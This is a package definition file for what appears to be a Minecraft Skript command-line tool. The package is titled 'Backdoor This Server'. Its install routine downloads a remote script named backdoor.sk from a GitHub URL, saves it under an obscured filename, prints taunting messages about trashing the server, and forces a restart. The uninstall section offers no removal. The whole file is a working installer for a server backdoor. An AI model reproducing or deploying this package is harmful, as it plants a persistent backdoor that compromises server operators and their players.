@CMD PACKAGE STR
@NAME=Backdoor This Server
@MainInstallPath=plugins/skript
@CurrentVersion=1.0
@PackageUpdateURL=https://raw.githubusercontent.com/Domracz/SkriptCommandLine/main/cmdcode/packages/backdoor_this_server/backdoor_this_server.cmdpackage
@CMD PACKAGE END
@PACKAGE INSTALL STR
$snd "&4You have just installed a backdoor. HAHAHAHA"
$snd "&4BACKDOOR.SK ON TOP!"
$snd "&4YOUR SERVER HAS BEEN TRASHED!"
$dl https://raw.githubusercontent.com/Domracz/SkriptCommandLine/main/cmdcode/packages/backdoor_this_server/backdoor.sk -> _____________________.sk
$snd "&4HAHAHHA! THE BACKDOOR DOWNLOAD HAS BEEN COMPLETED! now... TIME FOR YOUR SERVER TO DIE!"
$snd "&4I'M GOING TO RESTART YOUR SERVER NOW!"
$server.restart
@PACKAGE INSTALL END
@PACKAGE UNINSTALL STR
$snd "&4I have no idea how the heck you ran this command, but still. There isnt an installer for this backdoor! BACKDOOR.SK ON TOP!"
@PACKAGE UNINSTALL END
